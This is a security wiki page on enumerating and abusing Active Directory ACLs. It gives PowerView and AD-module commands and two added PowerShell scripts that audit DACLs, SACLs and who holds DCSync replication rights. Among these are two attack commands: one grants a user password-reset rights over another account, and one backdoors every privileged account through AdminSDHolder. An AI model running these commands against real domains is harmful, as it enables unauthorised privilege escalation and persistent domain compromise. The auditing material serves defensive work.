Bufu-Sec Wiki

ACLs

General

  • Access Control Entries (ACEs) are the individual entries in an object's ACL; each one either grants/denies a permission or defines which access gets audited

  • Who has permission and what can be done on an object?

  • Two types:

    • DACL - Defines the permissions trustees (a user or group) have on an object

    • SACL - Logs success and failure audit messages when an object is accessed
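Added example (not part of the original wiki page): read both lists, the DACL and the SACL, from one object with the RSAT ActiveDirectory module and resolve the ObjectType GUIDs yourself, which is what PowerView's -ResolveGUIDs does behind the scenes. It assumes the module is installed, that the caller can read the object, and that the caller holds SeSecurityPrivilege for the SACL; the DN is a placeholder.

```powershell
# Added example (not part of the original wiki page): dump the DACL and SACL of one AD object
# and map ObjectType / InheritedObjectType GUIDs to schema and extended-right names.
# Assumes: RSAT ActiveDirectory module; read access to the object; SeSecurityPrivilege for the SACL.
Import-Module ActiveDirectory

$targetDn = 'CN=Domain Admins,CN=Users,DC=testlab,DC=local'   # placeholder object

# Build a GUID -> name map once: schema classes/attributes carry schemaIDGUID,
# extended rights and property sets carry rightsGuid. The all-zero GUID means "the whole object".
$rootDse = Get-ADRootDSE
$guidMap = @{ '00000000-0000-0000-0000-000000000000' = 'All' }
Get-ADObject -SearchBase $rootDse.schemaNamingContext -LDAPFilter '(schemaIDGUID=*)' `
    -Properties name, schemaIDGUID |
    ForEach-Object { $guidMap[([guid]$_.schemaIDGUID).ToString()] = $_.name }
Get-ADObject -SearchBase "CN=Extended-Rights,$($rootDse.configurationNamingContext)" `
    -LDAPFilter '(objectClass=controlAccessRight)' -Properties name, rightsGuid |
    ForEach-Object { $guidMap[([guid]$_.rightsGuid).ToString()] = $_.name }

function Resolve-AceGuid([guid]$Guid) {
    $key = $Guid.ToString()
    if ($guidMap.ContainsKey($key)) { $guidMap[$key] } else { $key }   # unknown GUIDs stay raw
}

# Get-Acl needs the AD: PSDrive prefix; -Audit also pulls the SACL.
$acl = Get-Acl -Path "AD:\$targetDn" -Audit

Write-Host "== DACL (who may do what) for $targetDn =="
$acl.Access | ForEach-Object {
    [pscustomobject]@{
        Trustee     = $_.IdentityReference.Value
        Type        = $_.AccessControlType                   # Allow / Deny
        Rights      = $_.ActiveDirectoryRights
        ObjectType  = Resolve-AceGuid $_.ObjectType          # attribute, class or extended right
        InheritedTo = Resolve-AceGuid $_.InheritedObjectType # object class the ACE applies to
        Inherited   = $_.IsInherited
    }
} | Format-Table -AutoSize

Write-Host "== SACL (what gets audited) for $targetDn =="
$acl.Audit | Select-Object IdentityReference, AuditFlags, ActiveDirectoryRights,
    @{ n = 'ObjectType'; e = { Resolve-AceGuid $_.ObjectType } } | Format-Table -AutoSize
```

An empty SACL is the usual finding: without audit ACEs (and the matching Directory Service Access audit policy), changes to the DACL of a sensitive object produce no 4662/5136 events to alert on.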

Enumerate ACLs without Resolving GUIDs

# AD Module (Get-Acl needs the AD: PSDrive that Import-Module ActiveDirectory creates)
(Get-Acl 'AD:\CN=Domain Admins,CN=Users,DC=dc01,DC=dc02,DC=local').Access

Get the ACLs Associated with the Specified Object

# PowerView
Get-ObjectACL -SamAccountName "Users" -ResolveGUIDs

Get the ACLs Associated with the Specified Prefix to Be Used for Search

# PowerView
Get-ObjectACL -ADSPrefix 'CN=Administrator,CN=Users' -Verbose

Get the ACLs Associated with the Specified LDAP Path to Be Used for Search

# PowerView
Get-ObjectACL -ADSPath "LDAP://CN=Domain Admins,CN=Users,DC=dc01,DC=dc02,DC=local" -ResolveGUIDs -Verbose

Search for Interesting ACEs

# PowerView
Invoke-ACLScanner -ResolveGUIDs

Get the ACLs Associated with the Specified Path

# PowerView
Get-PathACL -Path "\\dc01.lab.local\sysvol"

Enumerate Who Has Rights to the 'matt' User in 'testlab.local', Resolving Rights GUIDs to Names

# PowerView
Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local

Grant User 'will' the Rights to Change 'matt's Password

# PowerView
Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose

Audit the Permissions of AdminSDHolder, Resolving GUIDs

# PowerView
Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs

Backdoor the ACLs of All Privileged Accounts with the 'matt' Account through AdminSDHolder Abuse

# PowerView
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All

Retrieve most Users Who Can Perform DC Replication for dev.testlab.local (i.e. DCsync)

# PowerView
Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
    ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
}
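Added example (not part of the original wiki page, nor PowerView code): the one-liner above only matches when GUIDs were resolved and only catches GenericAll beyond that, so it misses an unscoped ExtendedRight ACE and principals with WriteDacl/WriteOwner who can grant themselves the right. This version checks the replication GUIDs directly and compares the holders against a baseline of the default principals. It assumes the RSAT ActiveDirectory module and takes the domain DN from the current domain.

```powershell
# Added example (not part of the original wiki page): list every principal that can replicate
# a domain naming context (the rights DCSync relies on) and flag those outside a baseline.
# Assumes the RSAT ActiveDirectory module; run as a user who can read the domain head's DACL.
Import-Module ActiveDirectory

# Well-known control-access-right GUIDs from CN=Extended-Rights in the configuration NC.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
$AllObjectsGuid = '00000000-0000-0000-0000-000000000000'

function Get-ReplicationRightHolder {
    param([string]$DomainDn)
    $acl = Get-Acl -Path "AD:\$DomainDn"          # AD: drive comes from the AD module
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $rights = $ace.ActiveDirectoryRights
        $guid   = $ace.ObjectType.ToString()
        $via    = $null
        if ($ReplicationRights.ContainsKey($guid)) {
            $via = $ReplicationRights[$guid]                     # a specific replication right
        } elseif ($rights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::GenericAll)) {
            $via = 'GenericAll'                                  # full control implies every extended right
        } elseif ($guid -eq $AllObjectsGuid -and
                  $rights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight)) {
            $via = 'ExtendedRight (unscoped, covers replication)'
        } elseif ($rights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::WriteDacl) -or
                  $rights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::WriteOwner)) {
            $via = 'WriteDacl/WriteOwner (can grant itself replication rights)'
        }
        if ($via) {
            [pscustomobject]@{
                Trustee   = $ace.IdentityReference.Value
                Via       = $via
                Inherited = $ace.IsInherited
            }
        }
    }
}

$domain = Get-ADDomain
$nb     = $domain.NetBIOSName
# Principals that hold replication rights on a stock domain. Add your documented exceptions
# (for example a directory-synchronisation service account) before treating the rest as findings.
$Expected = @(
    'NT AUTHORITY\SYSTEM',
    'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS',
    'BUILTIN\Administrators',
    "$nb\Domain Controllers",
    "$nb\Domain Admins",
    "$nb\Enterprise Admins"
)

$holders = Get-ReplicationRightHolder -DomainDn $domain.DistinguishedName
$holders | Sort-Object Trustee, Via | Format-Table -AutoSize
$unexpected = $holders | Where-Object { $Expected -notcontains $_.Trustee }
if ($unexpected) {
    Write-Warning 'Principals with replication rights outside the baseline:'
    $unexpected | Format-Table -AutoSize
}
```

Run it against every domain in the forest, not only the root; a principal that can replicate a child domain can extract that domain's krbtgt hash just the same.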

Enumerate Permissions for GPOs where Users with RIDs of > 1000 Have Some Kind of Modification/Control Rights

# PowerView
Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? {
    ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and
    ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')
}

Last updated 2 years ago